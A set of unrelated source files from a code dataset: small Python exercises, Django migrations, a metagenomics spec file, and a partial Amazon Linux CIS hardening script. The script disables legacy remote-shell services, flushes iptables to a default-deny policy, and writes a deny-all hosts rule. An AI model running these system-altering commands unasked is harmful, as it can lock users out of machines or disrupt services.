        task_runs = json.load(f)
    print(" Found %s task runs" % str(len(task_runs)))

    #/* ======================================================================= */#
    #/*     Process Data
    #/* ======================================================================= */#

    print("Processing data...")
    output_json = []
    i = 0
    tot_tasks = len(task_runs)
    for tr in task_runs:

        # Update user with a one-line progress counter
        i += 1
        sys.stdout.write("\r\x1b[K" + " %s/%s" % (str(i), str(tot_tasks)))
        sys.stdout.flush()

        # Merge the parent task's (prefixed) fields into the task run
        task = get_task(tr['task_id'], tasks)
        if task is None:
            print(" - SKIPPED: Did not find task for task run: %s" % tr['task_id'])
        else:
            task = adjust_fields(field_prefix, task)
            for field, content in task.items():
                tr[field] = content
            output_json.append(tr)

    #/* ======================================================================= */#
    #/*     Write Output
    #/* ======================================================================= */#

    print("")
    print("Writing output...")
    with open(output_file, 'w') as f:
        json.dump(output_json, f)

    #/* ======================================================================= */#
    #/*     Cleanup
    #/* ======================================================================= */#

    # Success
    print("Done.")
    return 0
#/* ======================================================================= */#
#/* Commandline Execution
#/* ======================================================================= */#
if __name__ == '__main__':

    # Didn't get enough arguments - print usage and exit.
    # BUGFIX: the original used "len(sys.argv) is 1" - identity comparison
    # against an int literal only works due to CPython's small-int caching;
    # equality is the correct operator.
    if len(sys.argv) == 1:
        sys.exit(print_usage())

    # Got enough arguments - give sys.argv[1:] to main()
    else:
        sys.exit(main(sys.argv[1:]))
| [
"kevin@skytruth.org"
] | kevin@skytruth.org |
4f9ca14ac345b49bbb0027d21927469e5a86964b | 9173442035ac395d841b8e6a0de00b790adec9f1 | /python/indexing.py | f72e3f84d409affc75e97715b2a3614d48b73252 | [] | no_license | rana811/python | ffcf356adb9424be1232502a144ffda614c444a7 | ac3b0a1f8af3c948d34d07031f707914792612e6 | refs/heads/master | 2022-07-17T01:04:10.670155 | 2020-05-10T14:57:44 | 2020-05-10T14:57:44 | 262,807,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | # Get [1, 4, 5] from [[1, 2], [3, 4], [5, 6]] using indexing
import numpy as np
def extract(a_list):
return a_list[0][0],a_list[1][1],a_list[2,0]
arraylist = np.array([[1,2],[3,4],[5,6]])
print(extract(arraylist)) | [
"noreply@github.com"
] | noreply@github.com |
ca15e754c14f4db76db15fe9fb24de4b5692d004 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4459099.3.spec | f64a808352387d76005b2abdd7351b26ddfed579 | [] | no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,321 | spec | {
"id": "mgm4459099.3",
"metadata": {
"mgm4459099.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1797195,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 12697,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 450,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 2985,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1209484,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 579,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 62053,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 308,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 2063115,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 417890,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 111447,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 70938,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 747722,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 37710,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 20045,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 45369,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 64413,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 21824443,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 128,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 1553,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 5075,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 7360,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 2823,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 638,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22820,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 80,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 21679,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.species.stats"
}
},
"id": "mgm4459099.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4459099.3"
}
},
"raw": {
"mgm4459099.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4459099.3"
}
}
} | [
"jared.wilkening@gmail.com"
] | jared.wilkening@gmail.com |
6f590f2c761cd1220e5ca1df8b95fc08618bfc20 | 85dfec15ff7b358efdae421809e95f4d8d356c23 | /lab5_1/ppo/migrations/0001_initial.py | 1d4f47c0dbea9687294836997563433b6a6f2b7c | [] | no_license | Abenov222Sanjar/django | cc874f00d7dc9b6e438a5acaf5d0e2e11e4f17c8 | b40040a0dad8c6bd507fe29c54160b30ec41b85d | refs/heads/master | 2023-03-23T16:25:39.227069 | 2021-03-20T08:53:29 | 2021-03-20T08:53:29 | 349,625,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,389 | py | # Generated by Django 3.1.7 on 2021-03-20 08:24
from django.db import migrations, models
import ppo.models
class Migration(migrations.Migration):
    # Auto-generated by Django (makemigrations); creates the custom MainUser
    # model that replaces django.contrib.auth's default User.
    initial = True
    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='MainUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                # email is the unique login identifier (no username field).
                ('email', models.EmailField(max_length=254, unique=True, verbose_name='email address')),
                ('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
                ('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
                ('is_active', models.BooleanField(default=True, verbose_name='active')),
                ('is_staff', models.BooleanField(default=False, verbose_name='is_staff')),
                # Role-based access levels; default 4 = plain employee.
                ('role', models.SmallIntegerField(choices=[(1, 'super admin'), (2, 'company director'), (3, 'hr manager'), (4, 'employee'), (5, 'department director')], default=4)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
            },
            managers=[
                ('objects', ppo.models.MainUserManager()),
            ],
        ),
    ]
| [
"d.sanjjjar@gmail.com"
] | d.sanjjjar@gmail.com |
589622c55a74eca1fc73975a0a765d941516878c | 0531120d1b6130633a6e0f95299b58867526174d | /file5_1.py | 84e22f6199f6883446ed88aa523a3760c19b9c3c | [] | no_license | wohao/cookbook | d5a5c6dce954dcf9b5f46389755362c8ae37cf32 | e7da30d4db804eed7cb752cc078239a9c4bcff06 | refs/heads/master | 2020-12-30T16:15:16.743739 | 2017-05-11T11:25:40 | 2017-05-11T11:25:40 | 90,970,931 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,759 | py | with open('somefile.txt','wt') as f:
f.write('I Love You')
f = open('somefile.txt','rt')
data = f.read()
f.close()
with open('D:\python\cookbook\somefile.txt','wt') as f:
print('Hello world!',file=f)
print('ACME',50,91.5)
print('ACME',50,91.5, sep='')
print('ACME',50,91.5, sep=',')
print('ACME',50,91.5, sep='',end='!!\n')
for i in range(5):
print(i,end=' ')
rows = ('ACME',50,91.5)
print(','.join(str(x) for x in rows))
print(*rows,sep=',')
with open('somefile.bin','wb') as f:
f.write(b'Hello world')
with open('somefile.bin','rb') as f:
data = f.read()
print(data)
b = b'hello world'
for c in b :
print(c)
with open('somefile.bin','wb') as f :
text = 'I love you'
f.write(text.encode('utf-8'))
with open('somefile.bin','rb') as f:
data =f.read(16)
text = data.decode('utf-8')
print(text)
import array
nums = array.array('i',[1,2,3,4])
with open('data.bin','wb') as f:
f.write(nums)
a = array.array('i',[0,0,0,0,0,0,0])
with open('data.bin','rb') as f:
f.readinto(a)
print(a)
# with open('D:\python\cookbook\somefile.txt','xt') as f:
# f.write('I love you')
import os
if not os.path.exists('D:\python\cookbook\somefile.txt'):
with open('D:\python\cookbook\somefile.txt','wt') as f:
f.write('I love you')
else:
print('file already exists')
import io
s = io.StringIO()
s.write('hello world\n')
print('this is a test',file=s)
print(s.getvalue())
s =io.StringIO('Hello\nworld\n')
print(s.read(4))
print(s.read())
s = io.BytesIO()
s.write(b'binary data')
print(s.getvalue())
import gzip
with gzip.open('somefile.gz','rt') as f:
#f.write(text)
text = f.read()
print(text)
import bz2
with bz2.open('somefile.bz2','wt') as f:
f.write(text)
f = open('somefile.gz','rb')
with gzip.open(f,'rt') as g:
text = g.read()
| [
"2285687708@qq.com"
] | 2285687708@qq.com |
299d305fdf5120d7ae4877948db9c5066b969a08 | 74a8a159eacf9ae58ad9fe18d9ef2ce7e07f7abb | /agora/board/migrations/0002_auto_20150205_0230.py | a66dd58fe30964a8edfd0fa707985c61a31c1495 | [] | no_license | anderoonies/Agora | 74893317be2f0865f1c8667bfb07f7e6b8a0a7de | 2fdcd750f6b374d22fe223cb7908e35c2dcde2c6 | refs/heads/master | 2021-01-16T19:44:20.862465 | 2015-02-15T21:29:14 | 2015-02-15T21:29:14 | 30,504,649 | 0 | 0 | null | 2015-02-08T20:30:28 | 2015-02-08T20:30:27 | null | UTF-8 | Python | false | false | 605 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated by Django; relaxes two Post fields to allow NULL.
    dependencies = [
        ('board', '0001_initial'),
    ]
    operations = [
        # Post.score becomes nullable (was required).
        migrations.AlterField(
            model_name='post',
            name='score',
            field=models.SmallIntegerField(null=True),
            preserve_default=True,
        ),
        # Post.time becomes nullable (was required).
        migrations.AlterField(
            model_name='post',
            name='time',
            field=models.DateField(null=True),
            preserve_default=True,
        ),
    ]
| [
"andrewbayer2016@u.northwestern.edu"
] | andrewbayer2016@u.northwestern.edu |
b3f5d0c910c8f9d43e879694c07e0dc8cb5a7f18 | 75bc35acfc11f9d142dfaf66d276131538e6812d | /__main__.py | 241fc68d6cce1db77c061bcecd775704163c485f | [] | no_license | arunreddy00/AmazonLinux-Hardeningscript | 6f60d4ba52cc856124e0ca145b2cff0ce72d8fa7 | 1037b3301f11e9107555142c24cd6bb5f99fd827 | refs/heads/main | 2023-04-18T10:20:23.056121 | 2021-05-09T15:19:03 | 2021-05-09T15:19:03 | 365,781,821 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 19,331 | py | """Bootstrap script for Amazon Linux to comply CIS Amazon Linux Benchmark v2.0.0"""
import argparse
import logging
import os
import re
from subprocess import CalledProcessError
import pkg_resources
from util import exec_shell, set_backup_enabled, File, Package, Service, PropertyFile
def get_string_asset(path):
    """Return the raw contents of the packaged file at ``assets/<path>``."""
    asset_path = 'assets/{0}'.format(path)
    return pkg_resources.resource_string(__name__, asset_path)
def disable_unused_filesystems():
    """1.1.1 Disable unused filesystems"""
    # Map each blacklisted filesystem module to /bin/true so modprobe
    # cannot actually load it.
    blacklist = ('cramfs', 'freevxfs', 'jffs2', 'hfs',
                 'hfsplus', 'squashfs', 'udf', 'vfat')
    conf = PropertyFile('/etc/modprobe.d/CIS.conf', ' ')
    for fs_name in blacklist:
        conf.override({'install {0}'.format(fs_name): '/bin/true'})
    conf.write()
def set_mount_options():
    """1.1.2 - 1.1.17"""
    # Hardened fstab records for the partitions CIS asks to restrict
    # (nosuid/nodev/noexec on tmp-style mounts, nodev on /home).
    # NOTE(review): /home is assumed to live on /dev/xvdf1 -- confirm on the
    # target instance before enabling this step.
    options = {
        '/tmp': 'tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0',
        '/var/tmp': 'tmpfs /var/tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0',
        '/home': '/dev/xvdf1 /home ext4 rw,nodev,relatime,data=ordered 0 0',
        '/dev/shm': 'tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime 0 0'
    }
    # Preserve every existing fstab entry whose mount point is not
    # overridden above (comments are dropped on rewrite).
    with open('/etc/fstab', 'r') as f:
        for line in f:
            if line.startswith('#'):
                continue
            partition = line.split()[1]
            if partition not in options:
                options[partition] = line.strip()
    # Rewrite fstab with the merged set of records.
    with open('/etc/fstab', 'w') as f:
        for record in options.values():
            f.write('{}\n'.format(record))
# Shell pipeline: list local mount points, find world-writable directories
# under them, and add the sticky bit to each.  Returns 1 on pipeline failure.
def ensure_sticky_bit():
    """1.1.18 Ensure sticky bit is set on all world - writable directories"""
    try:
        return exec_shell(['df --local -P | awk {\'if (NR!=1) print $6\'} | xargs -I \'{}\' find \'{}\' -xdev -type d -perm -0002 2>/dev/null | xargs chmod a+t'])
    except CalledProcessError:
        return 1
def disable_automounting():
    """1.1.19 Disable Automounting"""
    Service('autofs').disable()
def enable_aide():
    """1.3 Filesystem Integrity Checking"""
    # Daily 05:00 integrity check; the crontab pipeline first strips any
    # pre-existing aide entry so the job is never duplicated.
    cron_job = '0 5 * * * /usr/sbin/aide --check'
    Package('aide').install()
    return exec_shell([
        'aide --init',
        'mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz',
        '(crontab -u root -l 2>/dev/null | grep -v /usr/sbin/aide; echo "{}") | crontab -'.format(cron_job)
    ])
def secure_boot_settings():
    """1.4 Secure Boot Settings"""
    # Restrict access to the legacy GRUB config when present.
    if os.path.isfile('/boot/grub/menu.lst'):
        exec_shell([
            'chown root:root /boot/grub/menu.lst',
            'chmod og-rwx /boot/grub/menu.lst'
        ])
    # Require root authentication for single-user mode.
    PropertyFile('/etc/sysconfig/init', '=').override({
        'SINGLE': '/sbin/sulogin',
        'PROMPT': 'no'
    }).write()
def apply_process_hardenings():
    """1.5 Additional Process Hardening"""
    # 1.5.1 Ensure core dumps are restricted
    PropertyFile('/etc/security/limits.conf', ' ').override({
        '* hard core': '0'
    }).write()
    PropertyFile('/etc/sysctl.conf', ' = ').override({
        'fs.suid_dumpable': '0'
    }).write()
    # 1.5.3 Ensure address space layout randomization (ASLR) is enable
    PropertyFile('/etc/sysctl.conf', ' = ').override({
        'kernel.randomize_va_space': '2'
    }).write()
    # 1.5.4 Ensure prelink is disabled
    Package('prelink').remove()
def configure_warning_banners():
    """1.7 Warning Banners"""
    # 1.7.1 Command Line Warning Banners
    # Disable the dynamic MOTD so the static banner below is what users see.
    exec_shell([
        'update-motd --disable',
        'chown root:root /etc/motd',
        'chmod 644 /etc/motd'
    ])
    File('/etc/motd').write(get_string_asset('/etc/motd'))
    exec_shell(['chown root:root /etc/issue', 'chmod 644 /etc/issue'])
    File('/etc/issue').write('Authorized uses only. All activity may be monitored and reported.\n')
    exec_shell(['chown root:root /etc/issue.net', 'chmod 644 /etc/issue.net'])
    File('/etc/issue.net').write('Authorized uses only. All activity may be monitored and reported.\n')
def ensure_updated():
    """1.8 Ensure updates, patches, and additional security software are installed"""
    Package.update_all()
def disable_inetd_services():
    """2.1 inetd Services"""
    # Legacy inetd/xinetd services the benchmark requires to be off.
    inetd_services = ('chargen-dgram', 'chargen-stream', 'daytime-dgram',
                      'daytime-stream', 'discard-dgram', 'discard-stream',
                      'echo-dgram', 'echo-stream', 'time-dgram',
                      'time-stream', 'rexec', 'rlogin', 'rsh', 'talk',
                      'telnet', 'tftp', 'rsync', 'xinetd')
    for service_name in inetd_services:
        Service(service_name).disable()
def configure_time_synchronization(upstream, chrony=True):
    """2.2.1 Time Synchronization"""
    # Exactly one implementation (chrony or ntp) is kept installed; the
    # selected helper removes the other.
    if chrony:
        configure_chrony(upstream)
    else:
        configure_ntp(upstream)
def configure_ntp(upstream):
    """2.2.1 Time Synchronization"""
    # 2.2.1.1 Ensure time synchronization is in use
    Package('chrony').remove()
    Package('ntp').install()
    # 2.2.1.2 Ensure ntp is configured
    # None drops the bare 'restrict default' line in favor of the explicit
    # -4/-6 variants below.
    PropertyFile('/etc/ntp.conf', ' ').override({
        'restrict default': None,
        'restrict -4 default': 'kod nomodify notrap nopeer noquery',
        'restrict -6 default': 'kod nomodify notrap nopeer noquery',
        'server': upstream
    }).write()
    # Run ntpd as the unprivileged ntp user.
    PropertyFile('/etc/sysconfig/ntpd', '=').override({
        'OPTIONS': '"-u ntp:ntp"'
    }).write()
def configure_chrony(upstream):
    """2.2.1 Time Synchronization"""
    # 2.2.1.1 Ensure time synchronization is in use
    Package('ntp').remove()
    Package('chrony').install()
    # 2.2.1.3 Ensure chrony is configured
    PropertyFile('/etc/chrony.conf', ' ').override({
        'server': upstream
    }).write()
    # Run chronyd as the unprivileged chrony user.
    PropertyFile('/etc/sysconfig/chronyd', '=').override({
        'OPTIONS': '"-u chrony"'
    }).write()
    exec_shell([
        'chkconfig chronyd on',
    ])
def remove_x11_packages():
    """2.2.2 Ensure X Window System is not installed"""
    Package('xorg-x11*').remove()
def disable_special_services():
    """2.2.3 - 2.2.14, 2.2.16"""
    # Server daemons the benchmark requires to be off on a hardened host.
    services = [
        'avahi-daemon', 'cups',
        'dhcpd', 'slapd', 'nfs', 'rpcbind', 'named', 'vsftpd',
        'httpd', 'dovecot', 'smb', 'squid', 'snmpd', 'ypserv'
    ]
    for srv in services:
        Service(srv).disable()
def configure_mta():
    """2.2.15 Ensure mail transfer agent is configured for local - only mode"""
    # Create the postfix config if it does not exist yet, then bind the MTA
    # to the loopback interface only.
    exec_shell([
        'mkdir -p /etc/postfix',
        'touch /etc/postfix/main.cf'
    ])
    PropertyFile('/etc/postfix/main.cf', ' = ').override({
        'inet_interfaces': 'localhost'
    }).write()
def remove_insecure_clients():
    """2.3 Service Clients"""
    # Legacy/cleartext client packages to uninstall.
    packages = [
        'ypbind', 'rsh', 'talk',
        'telnet', 'openldap-clients'
    ]
    for package in packages:
        Package(package).remove()
def configure_host_network_params():
    """3.1 Network Parameters(Host Only)"""
    # Disable IP forwarding and ICMP redirect sending (host, not router).
    PropertyFile('/etc/sysctl.conf', ' = ').override({
        'net.ipv4.ip_forward': '0',
        'net.ipv4.conf.all.send_redirects': '0',
        'net.ipv4.conf.default.send_redirects': '0',
    }).write()
def configure_network_params():
    """3.2 Network Parameters(Host and Router)"""
    # Reject source-routed/redirect packets, log martians, enable reverse
    # path filtering and SYN cookies.
    PropertyFile('/etc/sysctl.conf', ' = ').override({
        'net.ipv4.conf.all.accept_source_route': '0',
        'net.ipv4.conf.default.accept_source_route': '0',
        'net.ipv4.conf.all.accept_redirects': '0',
        'net.ipv4.conf.default.accept_redirects': '0',
        'net.ipv4.conf.all.secure_redirects': '0',
        'net.ipv4.conf.default.secure_redirects': '0',
        'net.ipv4.conf.all.log_martians': '1',
        'net.ipv4.conf.default.log_martians': '1',
        'net.ipv4.icmp_echo_ignore_broadcasts': '1',
        'net.ipv4.icmp_ignore_bogus_error_responses': '1',
        'net.ipv4.conf.all.rp_filter': '1',
        'net.ipv4.conf.default.rp_filter': '1',
        'net.ipv4.tcp_syncookies': '1'
    }).write()
def configure_ipv6_params():
    """3.3 IPv6"""
    # Ignore router advertisements and redirects ...
    PropertyFile('/etc/sysctl.conf', ' = ').override({
        'net.ipv6.conf.all.accept_ra': '0',
        'net.ipv6.conf.default.accept_ra': '0',
        'net.ipv6.conf.all.accept_redirects': '0',
        'net.ipv6.conf.default.accept_redirects': '0'
    }).write()
    # 3.3.3 Ensure IPv6 is disabled
    PropertyFile('/etc/modprobe.d/CIS.conf', ' ').override({
        'options ipv6': 'disable=1'
    }).write()
def configure_tcp_wrappers(hosts):
    """3.4 TCP Wrappers"""
    # 3.4.1 Ensure TCP Wrappers is installed
    Package('tcp_wrappers').install()
    if hosts:
        # 3.4.2 Ensure /etc/hosts.allow is configured
        allowed_hosts = ','.join(hosts)
        exec_shell('echo "ALL: {}" > /etc/hosts.allow'.format(allowed_hosts))
    # 3.4.3 Ensure /etc/hosts.deny is configured
    # NOTE(review): the deny-all rule is written even when no hosts were
    # given, i.e. hosts.allow stays empty -- this can lock out all wrapped
    # services.  Confirm this is the intended fail-closed behavior.
    exec_shell('echo "ALL: ALL" > /etc/hosts.deny')
    # 3.4.4 Ensure permissions on /etc/hosts.allow are configured
    exec_shell([
        'chown root:root /etc/hosts.allow',
        'chmod 644 /etc/hosts.allow'
    ])
    # 3.4.5 Ensure permissions on /etc/hosts.deny are configured
    exec_shell([
        'chown root:root /etc/hosts.deny',
        'chmod 644 /etc/hosts.deny'
    ])
def disable_uncommon_protocols():
    """3.5 Uncommon Network Protocols"""
    # Map each uncommon protocol module to /bin/true so it cannot load.
    modules = [
        'dccp', 'sctp', 'rds', 'tipc'
    ]
    prop = PropertyFile('/etc/modprobe.d/CIS.conf', ' ')
    for mod in modules:
        prop.override({'install {}'.format(mod): '/bin/true'})
    prop.write()
def configure_iptables():
    """3.6 Firewall Configuration

    Installs a default-deny ruleset: loopback traffic, established
    connections, and new inbound SSH (tcp/22) are the only things allowed.
    """
    Package('iptables').install()
    # NOTE(review): flushing and setting INPUT to DROP over a remote session
    # momentarily depends on the later rules being applied -- run on console
    # or via user-data, not over a fragile SSH link.
    exec_shell([
        'iptables -F',
        'iptables -P INPUT DROP',
        'iptables -P OUTPUT DROP',
        'iptables -P FORWARD DROP',
        'iptables -A INPUT -i lo -j ACCEPT',
        'iptables -A OUTPUT -o lo -j ACCEPT',
        'iptables -A INPUT -s 127.0.0.0/8 -j DROP',
        'iptables -A OUTPUT -p tcp -m state --state NEW,ESTABLISHED -j ACCEPT',
        'iptables -A OUTPUT -p udp -m state --state NEW,ESTABLISHED -j ACCEPT',
        'iptables -A OUTPUT -p icmp -m state --state NEW,ESTABLISHED -j ACCEPT',
        'iptables -A INPUT -p tcp -m state --state ESTABLISHED -j ACCEPT',
        'iptables -A INPUT -p udp -m state --state ESTABLISHED -j ACCEPT',
        'iptables -A INPUT -p icmp -m state --state ESTABLISHED -j ACCEPT',
        'iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT',
        'iptables-save'
    ])
def configure_rsyslog():
    """4.2.1 Configure rsyslog

    Installs rsyslog and writes the CIS-recommended routing rules into
    /etc/rsyslog.conf.  A leading '-' on a destination means asynchronous
    (non-fsynced) writes; $FileCreateMode 0640 keeps new logs group-readable
    only.
    """
    Package('rsyslog').install()
    PropertyFile('/etc/rsyslog.conf', ' ').override({
        '*.emerg': ':omusrmsg:*',
        'mail.*': '-/var/log/mail',
        'mail.info': '-/var/log/mail.info',
        'mail.warning': '-/var/log/mail.warn',
